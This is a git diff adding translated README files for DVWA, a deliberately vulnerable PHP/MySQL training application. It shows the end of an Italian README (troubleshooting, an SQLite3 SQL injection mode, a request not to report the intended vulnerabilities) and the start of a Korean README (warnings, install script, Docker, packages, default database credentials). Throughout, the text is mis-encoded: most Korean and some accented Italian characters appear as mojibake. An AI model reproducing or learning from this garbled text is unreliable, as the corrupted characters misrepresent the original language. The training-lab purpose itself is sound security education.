+-----------+------+-----------------------+ + | Host | User | plugin | + +-----------+------+-----------------------+ + | localhost | dvwa | mysql_native_password | + +-----------+------+-----------------------+ + 1 row in set (0.00 sec) + ``` + +Dopo tutto, il processo di inizializzazione dovrebbe funzionare normalmente. + +Se si vogliono piÚ informazioni vedere la seguente pagina: +. + +### Errore Del Database #2002: No such file or directory + +Il server del database non è in esecuzione. In un sistema basato su Debian questo si puÃ˛ risolvere con: + +```sh +sudo service mysql start +``` + +### Errori "MySQL server has gone away" e "Packets out of order" + +Ci sono diverse ragioni per cui si puÃ˛ ricevere questi errori, ma la piÚ probabile è che la versione del server database che si sta utilizzando non è compatibile con la versione di PHP. + +Questo problema si riscontra piÚ comunemente quando si utilizza l’ultima versione di MySQL, poichÊ PHP e MySQL non funzionano bene insieme. Il consiglio migliore è abbandonare MySQL e installare MariaDB, poichÊ questo è un problema che non possiamo supportare. + +Per piÚ informazioni, vedere: + + + +### PerchÊ il database non si connette a CentOS? + +Si potrebbero star riscontrando problemi con SELinux. Si puÃ˛ sia disabilitare SELinux oppure eseguire il seguente comando che consente di far comunicare il web server con il database: + +```sh +setsebool -P httpd_can_network_connect_db 1 +``` + +### Qualsiasi Altra Cosa + + +Per le informazioni piÚ aggiornate sulla risoluzione dei problemi, si prega di leggere sia i ticket aperti che quelli chiusi nel repository Git: + + + +Prima di inviare un ticket, assicurati di utilizzare l’ultima versione del codice dal repository. Questa non è l’ultima release, ma l’ultima versione del codice dal ramo master. + +Quando si apre un ticket, si prega di fornire almeno le seguenti informazioni: + +-Sistema operativo +-Le ultime 5 righe del log degli errori del server web subito dopo che si è verificato l’errore che stai segnalando +-Se si tratta di un problema di autenticazione al database, segui i passaggi indicati sopra e fai uno screenshot di ogni passaggio. Invia questi screenshot insieme a uno screenshot della sezione del file di configurazione che mostra l’utente e la password del database. +-Una descrizione completa di cosa sta andando storto, cosa ti aspetti che accada e cosa hai provato a fare per risolverlo. "Login non funziona" non è sufficiente per permetterci di capire il tuo problema e aiutarti a risolverlo. + +- - - + +## Tutorials + +CercherÃ˛ di realizzare alcuni video tutorial che illustrino alcune vulnerabilità e mostrino come individuarle e poi come sfruttarle. Ecco quelli che ho realizzato finora: + +[Trovare e Sftruttare Reflected XSS](https://youtu.be/V4MATqtdxss) + +- - - + +## SQLite3 SQL Injection + +Il supporto per questo è limitato; prima di segnalare problemi, assicurati di essere pronto a lavorare sul debug, non limitarti a dire “non funziona”. + +Per impostazione predefinita, gli attacchi SQLi e Blind SQLi vengono eseguiti contro il server MariaDB/MySQL utilizzato dal sito, ma è possibile passare a eseguire i test SQLi su SQLite3. + +Non spiegherÃ˛ come far funzionare SQLite3 con PHP, ma dovrebbe essere sufficiente installare il pacchetto `php-sqlite3` e assicurarsi che sia abilitato. + +Per effettuare il cambio, modifica semplicemente il file di configurazione aggiungendo o modificando queste righe: + +```php +$_DVWA["SQLI_DB"] = "sqlite"; +$_DVWA["SQLITE_DB"] = "sqli.db"; +``` + +Di default viene usato il file `database/sqli.db`, qualora si abbiano problemi, semplicemente copiare `database/sqli.db.dist` in alto. + +Le challenge sono esattamente quelle come per MariaDB, tuttavia ora utilizzano SQLite3. + +- - - + +👨‍đŸ’ģ Contributors +----- + +Grazie per tutti i vostri contributi e per mantenere aggiornato questo progetto. :heart: + +Se hai un'idea, qualche tipo di miglioramento o semplicemente vuoi collaborare, sei il benvenuto a contribuire e partecipare al progetto. Sentiti libero di inviare una pull request. + +

+ + + +

+ +- - - + +## Segnalare Vulnerabilità + +Per essere semplici, non fatelo! + +Circa una volta all’anno, qualcuno invia un report riguardo a una vulnerabilità trovata nell’applicazione. Alcuni di questi report sono ben scritti, a volte persino meglio di quelli che ho visto in test di penetrazione a pagamento; altri si limitano a dire “mancano degli header, pagatemi”. + +Nel 2023, la cosa ha raggiunto un nuovo livello quando qualcuno ha deciso di richiedere un CVE per una delle vulnerabilità, ottenendo [CVE-2023-39848](https://nvd.nist.gov/vuln/detail/CVE-2023-39848). Ne è seguito molto divertimento e si è perso tempo per sistemare la questione. + +L’applicazione contiene vulnerabilità, ed è voluto. La maggior parte sono quelle ben documentate che si affrontano come esercizi, altre sono vulnerabilità “nascoste”, da scoprire autonomamente. Se vuoi davvero dimostrare le tue capacità trovando quelle extra, scrivi un post sul blog o crea un video: probabilmente ci sono persone interessate ad apprendere come le hai individuate. Se ci mandi il link, potremmo anche includerlo tra i riferimenti. + +## Link + +Home del progetto: + +_Creato dal team DVWA_ + + diff --git a/DVWA/README.ko.md b/DVWA/README.ko.md new file mode 100644 index 00000000..c9f770e4 --- /dev/null +++ b/DVWA/README.ko.md @@ -0,0 +1,654 @@ +# DAMN VULNERABLE WEB APPLICATION + +Damn Vulnerable Web Application (DVWA)ė€ 매ėš° ėˇ¨ė•Ŋ한 PHP/MySQL ė›š ė• í”ŒëĻŦėŧ€ė´ė…˜ėž…니다. DVWAė˜ ėŖŧėš” ëĒŠí‘œëŠ” ëŗ´ė•ˆ ė „ëŦ¸ę°€ë“¤ė´ ėžė‹ ė˜ 기ėˆ ęŗŧ 도ęĩŦëĨŧ 합법ė ė¸ 환ę˛Ŋė—ė„œ 테ėŠ¤íŠ¸í•˜ęŗ , ė›š 개발ėžë“¤ė´ ė›š ė• í”ŒëĻŦėŧ€ė´ė…˜ ëŗ´ė•ˆ 프로ė„¸ėŠ¤ëĨŧ 더 ėž˜ ė´í•´í•˜ë„록 돕는 것ėž…니다. 또한, 학ėƒęŗŧ ęĩė‚Ŧ들ė´ í†ĩė œëœ ęĩė‹¤ 환ę˛Ŋė—ė„œ ė›š ė• í”ŒëĻŦėŧ€ė´ė…˜ ëŗ´ė•ˆė— 대해 ë°°ėš°ëŠ” 데 도ė›€ė„ ėŖŧęŗ ėž 합니다. + +DVWAė˜ ëĒŠí‘œëŠ” **가ėžĨ 흔한 ė›š ėˇ¨ė•Ŋė ë“¤ė— 대한 ė—°ėŠĩ**ė„ **다ė–‘í•œ 난ė´ë„ëĄœ ė œęŗĩ하는 것**ėž…니다. 간단하ęŗ  ė§ę´€ė ė¸ ė¸í„°íŽ˜ė´ėŠ¤ëĨŧ 갖ėļ”ęŗ  ėžˆėŠĩ니다. ė´ ė†Œí”„트ė›¨ė–´ė—ëŠ” **ëŦ¸ė„œí™”된 ėˇ¨ė•Ŋė ęŗŧ ëŦ¸ė„œí™”되ė§€ ė•Šė€ ėˇ¨ė•Ŋė **ė´ ëĒ¨ë‘ ėĄ´ėžŦ합니다. ė´ëŠ” ė˜ë„ė ė¸ 것ėœŧ로, 가ëŠĨ한 많ė€ ëŦ¸ė œëĨŧ 발ę˛Ŧ해 ëŗ´ė‹œę¸°ëĨŧ ęļŒėžĨ합니다. +- - - + +## ėŖŧė˜! + +Damn Vulnerable Web Applicationė€ 매ėš° ėˇ¨ė•Ŋ합니다! **호ėŠ¤íŒ… ė œęŗĩėžė˜ ęŗĩ개 html 폴더나 ė¸í„°ë„ˇė— 노ėļœëœ ė„œë˛„ė— ė—…ëĄœë“œí•˜ė§€ 마ė‹­ė‹œė˜¤.** 그렇ė§€ ė•Šėœŧ늴 ė„œë˛„ę°€ ėš¨í•´ë  ėˆ˜ ėžˆėŠĩ니다. 가ėƒ 머ė‹ (ė˜ˆ: [VirtualBox](https://www.virtualbox.org/) or [VMware](https://www.vmware.com/))ė„ ė‚ŦėšŠí•˜ęŗ  NAT 네트ė›Œí‚š ëĒ¨ë“œëĄœ ė„¤ė •í•˜ëŠ” 것ė´ ėĸ‹ėŠĩ니다. 게ėŠ¤íŠ¸ 머ė‹  내ė—ė„œ [XAMPP](https://www.apachefriends.org/)ëĨŧ 다ėš´ëĄœë“œí•˜ė—Ŧ ė›š ė„œë˛„ė™€ 데ė´í„°ë˛ ė´ėŠ¤ëĨŧ ė„¤ėš˜í•  ėˆ˜ ėžˆėŠĩ니다. + +### 늴ėą… ėĄ°í•­ + +ėš°ëĻŦ는 DVWAė˜ ė‚ŦėšŠ ë°Šė‹ė— 대해 ėą…ėž„ė„ ė§€ė§€ ė•ŠėŠĩ니다. ė• í”ŒëĻŦėŧ€ė´ė…˜ė˜ ëĒŠė ė€ ëĒ…확히 ė„¤ëĒ…되ė–´ ėžˆėœŧ늰, ė•…ė˜ė ėœŧ로 ė‚ŦėšŠí•´ė„œëŠ” ė•ˆ 됩니다. ė‚ŦėšŠėžę°€ DVWAëĨŧ ëŧė´ë¸Œ ė›š ė„œë˛„ė— ė„¤ėš˜í•˜ė§€ ė•Šë„록 ę˛Ŋęŗ ė™€ ėĄ°ėš˜ëĨŧ ėˇ¨í–ˆėŠĩ니다. DVWA ė„¤ėš˜ëĨŧ í†ĩ해 ė›š ė„œë˛„ę°€ ėš¨í•´ëœ ę˛Ŋėš°, ė´ëŠ” ė„¤ėš˜í•œ 개ė¸ė˜ ėą…ėž„ėž…니다. + +- - - + +## ëŧė´ė„ ėŠ¤ + +ė´ 파ėŧė€ Damn Vulnerable Web Application (DVWA)ė˜ ėŧëļ€ėž…니다. + +Damn Vulnerable Web Application (DVWA)ė€ ėžėœ  ė†Œí”„트ė›¨ė–´ėž…니다: 귀하는 ė´ëĨŧ ėžŦë°°íŦ하거나 ėˆ˜ė •í•  ėˆ˜ ėžˆėœŧ늰, GNU ėŧ반 ęŗĩė¤‘ ė‚ŦėšŠ 허가ė„œ(GNU General Public License) 버ė „ 3 또는 (ė˜ĩė…˜ėœŧ로) ꡸ ė´í›„ 버ė „ė˜ ėĄ°ęą´ė— 따ëŧ ė´ëĨŧ ė‚ŦėšŠí•  ėˆ˜ ėžˆėŠĩ니다. + +Damn Vulnerable Web Application (DVWA)ė€ ėœ ėšŠí•  것ė´ëŧ는 íŦ망ėœŧ로 ë°°íŦ되ė§€ë§Œ, ė–´ë– í•œ 형태ė˜ ëŗ´ėĻë„ ė œęŗĩ하ė§€ ė•ŠėŠĩ니다. ėƒė—…ė„ąė´ë‚˜ 특ė • ëĒŠė ė—ė˜ ė í•Šė„ąė— 대한 ëŦĩė‹œė ė¸ ëŗ´ėĻë„ íŦ함되ė§€ ė•ŠėŠĩ니다. ėžė„¸í•œ 내ėšŠė€ GNU ėŧ반 ęŗĩė¤‘ ė‚ŦėšŠ 허가ė„œëĨŧ ė°¸ėĄ°í•˜ė‹­ė‹œė˜¤. + +Damn Vulnerable Web Application (DVWA)ė™€ 함ęģ˜ GNU ėŧ반 ęŗĩė¤‘ ė‚ŦėšŠ 허가ė„œ ė‚Ŧëŗ¸ė„ 받ė•˜ė–´ė•ŧ 합니다. 그렇ė§€ ė•Šë‹¤ëŠ´ ė—ė„œ 확ė¸í•˜ė‹­ė‹œė˜¤. + +- - - + +## ęĩ­ė œí™” +ė´ 파ėŧė€ ė—ŦëŸŦ ė–¸ė–´ëĄœ ė œęŗĩ됩니다: +- ėŠ¤íŽ˜ė¸ė–´: [Espaol](README.es.md) +- ė•„랍ė–´: [اŲ„ØšØąØ¨ŲŠØŠ](README.ar.md) +- ė˜ė–´: [English](README.md) +- ė¸ë„네ė‹œė•„ė–´: [Indonesia](README.id.md) +- ė¤‘ęĩ­ė–´: [įŽ€äŊ“中文](README.zh.md) +- 터키ė–´: [Trke](README.tr.md) +- 페ëĨ´ė‹œė•„ė–´: [ŲØ§ØąØŗی](README.fa.md) +- íŦëĨ´íˆŦ갈ė–´: [Portugus](README.pt.md) +- 프랑ėŠ¤ė–´: [Franais](README.fr.md) +- 한ęĩ­ė–´: [한ęĩ­ė–´](README.ko.md) + +번ė—­ė— 기ė—Ŧ하ęŗ ėž 한다면 PRė„ ė œėļœí•´ ėŖŧė‹­ė‹œė˜¤. 단, ęĩŦ글 번ė—­ę¸°ëĨŧ ė‚ŦėšŠí•œ 번ė—­ė€ ęą°ëļ€ëŠë‹ˆë‹¤. 번ė—­ëŗ¸ė„ ė œėļœí•˜ë ¤ëŠ´, 번ė—­ëœ 'README.xx.md' 파ėŧė„ ėļ”ę°€í•˜ė‹­ė‹œė˜¤. ė—Ŧ기ė„œ xx는 ė›í•˜ëŠ” ė–¸ė–´ė˜ 두 글ėž ėŊ”ë“œ([ISO 639-1](https://en.wikipedia.org/wiki/List_of_ISO_639-1_codes) 기반)ėž…니다. + +## 다ėš´ëĄœë“œ + +DVWAė—ëŠ” ė—ŦëŸŦ 가ė§€ 버ė „ė´ ėžˆė§€ë§Œ, ėœ ėŧ하게 ė§€ė›ë˜ëŠ” 버ė „ė€ ęŗĩė‹ GitHub ė €ėžĨė†Œė—ė„œ ė œęŗĩ하는 ėĩœė‹  ė†ŒėŠ¤ėž…니다. ė €ėžĨė†Œė—ė„œ 클론할 ėˆ˜ ėžˆėŠĩ니다: + +``` +git clone https://github.com/digininja/DVWA.git +``` + +또는 [파ėŧė˜ ZIPė„ 다ėš´ëĄœë“œ](https://github.com/digininja/DVWA/archive/master.zip)할 ėˆ˜ ėžˆėŠĩ니다. + +- - - + +## ė„¤ėš˜ + +### ėžë™ ė„¤ėš˜ 🛠ī¸ + +**ė°¸ęŗ : ė´ę˛ƒė€ ęŗĩė‹ DVWA ėŠ¤íŦëĻŊ트가 ė•„니늰, [IamCarron](https://github.com/iamCarron/)ė— ė˜í•´ ėž‘ė„ąë˜ė—ˆėŠĩ니다. ėŠ¤íŦëĻŊ트ëĨŧ ėž‘ė„ąí•˜ëŠ” 데 많ė€ 노ë Ĩė´ 들ė–´ę°”ėœŧ늰, ėž‘ė„ą 당ė‹œė—ëŠ” ė•…ė˜ė ė¸ 행동ė„ 하ė§€ ė•Šė•˜ė§€ë§Œ, ė‹œėŠ¤í…œė—ė„œ ëŦ´ėž‘ė • ė‹¤í–‰í•˜ę¸° ė „ė— ėŠ¤íŦëĻŊ트ëĨŧ 검토하는 것ė´ ėĸ‹ėŠĩ니다. 버그가 발ę˛Ŧ되늴 ė´ęŗŗė´ ė•„ë‹Œ [IamCarron](https://github.com/iamCarron/)ė—ę˛Œ ëŗ´ęŗ í•´ ėŖŧė„¸ėš”.** + +Debian 기반 머ė‹ (Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS 등)ė—ė„œ DVWAëĨŧ ėžë™ėœŧ로 ęĩŦė„ąí•˜ëŠ” ėŠ¤íŦëĻŊ트ėž…니다. + +**ė°¸ęŗ : ė´ ėŠ¤íŦëĻŊ트는 ëŖ¨íŠ¸ ęļŒí•œė´ 필ėš”하늰 Debian 기반 ė‹œėŠ¤í…œė— 맞ėļ°ė ¸ ėžˆėŠĩ니다. 반드ė‹œ ëŖ¨íŠ¸ ė‚ŦėšŠėžëĄœ ė‹¤í–‰í•˜ė„¸ėš”.** + +#### ė„¤ėš˜ ėš”ęĩŦ ė‚Ŧ항 + +- **ėš´ė˜ ė˛´ė œ:** Debian 기반 ė‹œėŠ¤í…œ (Kali, Ubuntu, Kubuntu, Linux Mint, Zorin OS) +- **ęļŒí•œ:** ëŖ¨íŠ¸ ė‚ŦėšŠėžëĄœ ė‹¤í–‰ + +#### ė„¤ėš˜ 단ęŗ„ + +1. **ėŠ¤íŦëĻŊ트 다ėš´ëĄœë“œ:** + ```bash + wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh + ``` + +2. **ėŠ¤íŦëĻŊ트 ė‹¤í–‰ ęļŒí•œ ëļ€ė—Ŧ:** + ```bash + chmod +x Install-DVWA.sh + ``` + +3. **ëŖ¨íŠ¸ëĄœ ėŠ¤íŦëĻŊ트 ė‹¤í–‰:** + ```bash + sudo ./Install-DVWA.sh + ``` + +### ė„¤ėš˜ 동ė˜ėƒ + +- [VirtualBoxė—ė„œ ė‹¤í–‰ ė¤‘ė¸ Kaliė— DVWA ė„¤ėš˜](https://www.youtube.com/watch?v=WkyDxNJkgQ4) +- [Windowsė—ė„œ XAMPPëĨŧ ė‚ŦėšŠí•˜ė—Ŧ DVWA ė„¤ėš˜](https://youtu.be/Yzksa_WjnY0) +- [Windows 10ė— Damn Vulnerable Web Application (DVWA) ė„¤ėš˜](https://www.youtube.com/watch?v=cak2lQvBRAo) + +### Windows + XAMPP + +가ėžĨ ė‰Ŧėš´ DVWA ė„¤ėš˜ 방법ė€ [XAMPP](https://www.apachefriends.org/)ëĨŧ 다ėš´ëĄœë“œí•˜ė—Ŧ ė„¤ėš˜í•˜ëŠ” 것ėž…니다. ė´ë¯¸ ė›š ė„œë˛„ę°€ ė„¤ė •ë˜ė–´ ėžˆė§€ ė•Šė€ ę˛Ŋėš°ė— ėœ ėšŠí•Šë‹ˆë‹¤. + +XAMPP는 Linux, Solaris, Windows 및 Mac OS XėšŠėœŧ로 ė„¤ėš˜í•˜ę¸° ė‰Ŧėš´ Apache ë°°íŦ판ėž…니다. ė´ 패키ė§€ė—ëŠ” Apache ė›š ė„œë˛„, MySQL, PHP, Perl, FTP ė„œë˛„ 및 phpMyAdminė´ íŦ함되ė–´ ėžˆėŠĩ니다. + +ė´ [비디ė˜¤](https://youtu.be/Yzksa_WjnY0)는 Windowsė— 대한 ė„¤ėš˜ ęŗŧė •ė„ ė•ˆë‚´í•˜ė§€ë§Œ, 다ëĨ¸ OSė—ė„œë„ ėœ ė‚Ŧ할 것ėž…니다. + +### Docker + +[hoang-himself](https://github.com/hoang-himself)ė™€ [JGillam](https://github.com/JGillam) 덕ëļ„ė— `master` 브랜ėš˜ė— 대한 ëĒ¨ë“  ėģ¤ë°‹ė€ Docker ė´ë¯¸ė§€ëĨŧ 빌드하ęŗ  GitHub Container Registryė—ė„œ 내려받ė„ ėˆ˜ ėžˆę˛Œ 합니다. + +ė–ģė„ ėˆ˜ ėžˆëŠ” 것ė— 대한 ėžė„¸í•œ 내ėšŠė€ [ė‚Ŧė „ 빌드된 Docker ė´ë¯¸ė§€](https://github.com/digininja/DVWA/pkgs/container/dvwa)ëĨŧ ė°¸ėĄ°í•˜ė‹­ė‹œė˜¤. + +#### ė‹œėž‘í•˜ę¸° + +ė„ í–‰ ėš”ęą´: Docker 및 Docker Compose. + +- Docker Desktopė„ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš°, 두 가ė§€ę°€ ė´ë¯¸ ė„¤ėš˜ë˜ė–´ ėžˆė–´ė•ŧ 합니다. +- Linuxė—ė„œ Docker Engineė„ ė„ í˜¸í•˜ëŠ” ę˛Ŋėš°, [ė„¤ėš˜ 가ė´ë“œ](https://docs.docker.com/engine/install/#server)ëĨŧ 따ëŧ ė„¤ėš˜í•˜ė„¸ėš”. + +**ėœ„ė—ė„œ ė–¸ę¸‰í•œ ėĩœė‹  Docker ëĻ´ëĻŦėŠ¤ė— 대한 ė§€ė›ė„ ė œęŗĩ합니다.** +Linuxė—ė„œ 패키ė§€ 관ëĻŦėžëĨŧ í†ĩ해 ė œęŗĩ된 Docker 패키ė§€ëĨŧ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš°ė—ë„ ėž‘동할 가ëŠĨė„ąė´ ėžˆė§€ë§Œ, ė§€ė›ė€ ėĩœė„ ė˜ 노ë Ĩė„ 다합니다. + +패키ė§€ 관ëĻŦėž 버ė „ė—ė„œ ė—…ėŠ¤íŠ¸ëĻŧėœŧ로 DockerëĨŧ ė—…ęˇ¸ë ˆė´ë“œí•˜ë ¤ëŠ´ [Ubuntu](https://docs.docker.com/engine/install/ubuntu/#uninstall-old-versions), [Fedora](https://docs.docker.com/engine/install/fedora/#uninstall-old-versions) 등ė—ė„œ ė„¤ëĒ…하는 대로 ė´ė „ 버ė „ė„ ė œęą°í•´ė•ŧ 합니다. +Docker 데ė´í„°(ėģ¨í…Œė´ë„ˆ, ė´ë¯¸ė§€, ëŗŧëĨ¨ 등)는 ė˜í–Ĩė„ 받ė§€ ė•Šė•„ė•ŧ 하ė§€ë§Œ ëŦ¸ė œę°€ 발ėƒí•˜ëŠ´ [Dockerė— ė•ŒëĻŦęŗ ](https://www.docker.com/support) 검ėƒ‰ ė—”ė§„ė„ ė‚ŦėšŠí•˜ëŠ” 것ė´ ėĸ‹ėŠĩ니다. + +그런 다ėŒ ė‹œėž‘하려늴: + +1. `docker version` 및 `docker compose version`ė„ ė‹¤í–‰í•˜ė—Ŧ Docker 및 Docker Compose가 ė œëŒ€ëĄœ ė„¤ėš˜ë˜ė—ˆëŠ”ė§€ 확ė¸í•˜ė„¸ėš”. ėļœë Ĩė—ė„œ 해당 버ė „ė„ 확ė¸í•  ėˆ˜ ėžˆė–´ė•ŧ 합니다. + + ė˜ˆëĨŧ 들ė–´: + + ```text + >>> docker version + Client: + [...] + Version: 23.0.5 + [...] + + Server: Docker Desktop 4.19.0 (106363) + Engine: + [...] + Version: 23.0.5 + [...] + + >>> docker compose version + Docker Compose version v2.17.3 + ``` + + ė•„ëŦ´ę˛ƒë„ 표ė‹œë˜ė§€ ė•Šęą°ë‚˜ ëĒ…ë šė–´ëĨŧ ė°žė„ ėˆ˜ ė—†ë‹¤ëŠ” ė˜¤ëĨ˜ę°€ 발ėƒí•˜ëŠ´ Docker 및 Docker ComposeëĨŧ ė„¤ė •í•˜ę¸° ėœ„í•œ 필ėˆ˜ ėĄ°ęą´ė„ 따ëĨ´ė„¸ėš”. + +2. ė´ ëĻŦíŦė§€í† ëĻŦëĨŧ 클론하거나 다ėš´ëĄœë“œí•˜ė—Ŧ ė••ėļ•ė„ 풉니다 (ė°¸ėĄ° [다ėš´ëĄœë“œ](#download)). +3. ė„ íƒí•œ 터미널ė„ ė—´ęŗ  ėž‘ė—… 디렉터ëĻŦëĨŧ ė´ 폴더(`DVWA`)로 ëŗ€ę˛Ŋ합니다. +4. `docker compose up -d`ëĨŧ ė‹¤í–‰í•Šë‹ˆë‹¤. + +ė´ė œ DVWA는 `http://localhost:4280`ė—ė„œ ė‚ŦėšŠí•  ėˆ˜ ėžˆėŠĩ니다. + +**ėģ¨í…Œė´ë„ˆė—ė„œ DVWAëĨŧ ė‹¤í–‰í•  때, ė›š ė„œë˛„는 ėŧ반ė ė¸ íŦ트 80 대ė‹  íŦ트 4280ė—ė„œ ėˆ˜ė‹  대기하ęŗ  ėžˆėŠĩ니다.** +ė´ 결ė •ė— 대한 ėžė„¸í•œ 내ėšŠė€ [다ëĨ¸ íŦ트ė—ė„œ DVWAëĨŧ ė‹¤í–‰í•˜ęŗ  ė‹ļėŠĩ니다](#i-want-to-run-dvwa-on-a-different-port)ëĨŧ ė°¸ėĄ°í•˜ė„¸ėš”. + +#### 로ėģŦ 빌드 + +로ėģŦė—ė„œ ëŗ€ę˛Ŋ ė‚Ŧ항ė„ ė ėšŠí•˜ęŗ  프로ė íŠ¸ëĨŧ 빌드하려면 `compose.yml` 파ėŧė—ė„œ `pull_policy: always`ëĨŧ `pull_policy: build`로 ëŗ€ę˛Ŋ하ė‹­ė‹œė˜¤. + +`docker compose up -d`ëĨŧ ė‹¤í–‰í•˜ëŠ´ 레ė§€ėŠ¤íŠ¸ëĻŦė— ëŦ´ė—‡ė´ ėžˆë“  ėƒę´€ė—†ė´ Docker가 로ėģŦė—ė„œ ė´ë¯¸ė§€ëĨŧ 빌드하도록 트ëĻŦ거됩니다. + +ė°¸ėĄ°: [`pull_policy`](https://github.com/compose-spec/compose-spec/blob/master/05-services.md#pull_policy). + +### PHP 버ė „ + +ė´ėƒė ėœŧ로는 ėĩœė‹  ė•ˆė • 버ė „ė˜ PHPëĨŧ ė‚ŦėšŠí•˜ëŠ” 것ė´ ėĸ‹ėŠĩ니다. ė´ëŠ” ė´ ė•ąė´ 개발 및 테ėŠ¤íŠ¸ë˜ëŠ” 버ė „ėž…니다. + +PHP 5.xëĨŧ ė‚ŦėšŠí•˜ë ¤ëŠ” ė‚Ŧ람ė—ę˛ŒëŠ” ė§€ė›ė´ ė œęŗĩ되ė§€ ė•ŠėŠĩ니다. + +7.3 미만ė˜ 버ė „ė€ ëŦ¸ė œę°€ 발ėƒí•  ėˆ˜ ėžˆëŠ” ė•Œë ¤ė§„ ė´ėŠˆę°€ ėžˆėœŧ늰, 대ëļ€ëļ„ė˜ ė•ąė€ ėž‘ë™í•˜ę˛ ė§€ë§Œ ëŦ´ėž‘ėœ„ëĄœ ëŦ¸ė œę°€ 발ėƒí•  ėˆ˜ ėžˆėŠĩ니다. ė•„ėŖŧ ėĸ‹ė€ ė´ėœ ę°€ ė—†ëŠ” 한, 그렇게 ė˜¤ëž˜ëœ 버ė „ė„ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš° ė§€ė›ė´ ė œęŗĩ되ė§€ ė•ŠėŠĩ니다. + +### Linux 패키ė§€ + +Debian 기반 Linux ë°°íŦ판ė„ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš°, 다ėŒ 패키ė§€ _(또는 ė´ė— ėƒė‘하는 것)_ ëĨŧ ė„¤ėš˜í•´ė•ŧ 합니다: + +- apache2 +- libapache2-mod-php +- mariadb-server +- mariadb-client +- php +- php-mysqli +- php-gd + +ëĒ¨ë“  ėĩœė‹  버ė „ė„ 받기 ėœ„í•´ ė„¤ėš˜ ė „ė— ė—…데ė´íŠ¸ëĨŧ ėˆ˜í–‰í•˜ëŠ” 것ė´ ėĸ‹ėŠĩ니다. + +``` +apt update +apt install -y apache2 mariadb-server mariadb-client php php-mysqli php-gd libapache2-mod-php +``` + +ė´ ė‚Ŧė´íŠ¸ëŠ” MariaDB 대ė‹  MySQL로도 ėž‘동하ė§€ë§Œ, MySQLė„ ė˜Ŧ바ëĨ´ę˛Œ ėž‘동ė‹œí‚¤ę¸° ėœ„í•´ ëŗ€ę˛Ŋ해ė•ŧ 하는 반늴, MariaDB는 ëŗ„다ëĨ¸ ė„¤ė • ė—†ė´ 바로 ėž‘ë™í•˜ë¯€ëĄœ MariaDBëĨŧ 강ë Ĩ히 ėļ”ė˛œí•Šë‹ˆë‹¤. + +## ęĩŦė„ą + +### ė„¤ė • 파ėŧ + +DVWAė—ëŠ” 해당 ėœ„ėš˜ė— ëŗĩė‚Ŧ한 다ėŒ ė ė ˆí•œ ëŗ€ę˛Ŋ ė‚Ŧ항ė„ 가할 필ėš”ę°€ ėžˆëŠ” ė„¤ė • 파ėŧė˜ 더미 ëŗĩė‚Ŧëŗ¸ė´ 함ęģ˜ ė œęŗĩ됩니다. ëĻŦ눅ėŠ¤ė—ė„œëŠ” DVWA 디렉토ëĻŦė— ėžˆëŠ” 것ėœŧ로 가ė •í•˜ëŠ´ 다ėŒęŗŧ 같ė´ ėˆ˜í–‰í•  ėˆ˜ ėžˆėŠĩ니다: + +`cp config/config.inc.php.dist config/config.inc.php` + +Windowsė—ė„œëŠ” 파ėŧ 확ėžĨėžëĨŧ ėˆ¨ę¸°ëŠ” ę˛Ŋėš° ėĄ°ę¸ˆ 더 ė–´ë ¤ėš¸ ėˆ˜ ėžˆėŠĩ니다. ė´ė— 대해 ėžė„¸ížˆ ė•Œė•„ëŗ´ë ¤ëŠ´ 다ėŒ 블로그 íŦėŠ¤íŠ¸ëĨŧ ė°¸ėĄ°í•˜ė„¸ėš”: + +[Windowsė—ė„œ 파ėŧ 확ėžĨėž 표ė‹œí•˜ëŠ” 방법](https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/) + +### 데ė´í„°ë˛ ė´ėŠ¤ ė„¤ė • + +데ė´í„°ë˛ ė´ėŠ¤ëĨŧ ė„¤ė •í•˜ë ¤ëŠ´, 단ėˆœížˆ ėŖŧ 메뉴ė˜ `Setup DVWA` 버íŠŧė„ 클ëĻ­í•œ 다ėŒ `Create / Reset Database` 버íŠŧė„ 클ëĻ­í•˜ëŠ´ 됩니다. ė´ë ‡ę˛Œ 하면 데ė´í„°ë˛ ė´ėŠ¤ę°€ ėƒė„ąë˜ęą°ë‚˜ ėžŦė„¤ė •ë˜ëŠ° ėŧëļ€ 데ė´í„°ę°€ íŦ함됩니다. + +데ė´í„°ë˛ ė´ėŠ¤ëĨŧ ėƒė„ąí•˜ëŠ” 동ė•ˆ ė˜¤ëĨ˜ę°€ 발ėƒí•˜ëŠ´ `./config/config.inc.php` 내ė˜ 데ė´í„°ë˛ ė´ėŠ¤ ėžę˛Š ėĻëĒ…ė´ ė˜Ŧ바ëĨ¸ė§€ 확ė¸í•˜ė‹­ė‹œė˜¤. *ė´ëŠ” ė˜ˆė œ 파ėŧė¸ config.inc.php.distė™€ 다ëĻ…니다.* + +ëŗ€ėˆ˜ëŠ” 다ėŒęŗŧ 같ė´ 기ëŗ¸ę°’ėœŧ로 ė„¤ė •ëŠë‹ˆë‹¤: + +```php +$_DVWA[ 'db_server'] = '127.0.0.1'; +$_DVWA[ 'db_port'] = '3306'; +$_DVWA[ 'db_user' ] = 'dvwa'; +$_DVWA[ 'db_password' ] = 'p@ssw0rd'; +$_DVWA[ 'db_database' ] = 'dvwa'; +``` + +ė°¸ęŗ ëĄœ, MySQL 대ė‹  MariaDBëĨŧ ė‚ŦėšŠí•˜ëŠ” ę˛Ŋėš° (Kaliė˜ 기ëŗ¸ę°’ė€ MariaDBėž…니다), 데ė´í„°ë˛ ė´ėŠ¤ ëŖ¨íŠ¸ ė‚ŦėšŠėžëĨŧ ė‚ŦėšŠí•  ėˆ˜ ė—†ėœŧë¯€ëĄœ ėƒˆ 데ė´í„°ë˛ ė´ėŠ¤ ė‚ŦėšŠėžëĨŧ ėƒė„ąí•´ė•ŧ 합니다. ė´ëĨŧ ėœ„í•´ ëŖ¨íŠ¸ ė‚ŦėšŠėžëĄœ 데ė´í„°ë˛ ė´ėŠ¤ė— ė—°ę˛°í•œ 다ėŒ 다ėŒ ëĒ…ë šė„ ė‚ŦėšŠí•˜ė‹­ė‹œė˜¤: + +```mysql +mysql> create database dvwa; +Query OK, 1 row affected (0.00 sec) + +mysql> create user dvwa@localhost identified by 'p@ssw0rd'; +Query OK, 0 rows affected (0.01 sec) + +mysql> grant all on dvwa.* to dvwa@localhost; +Query OK, 0 rows affected (0.01 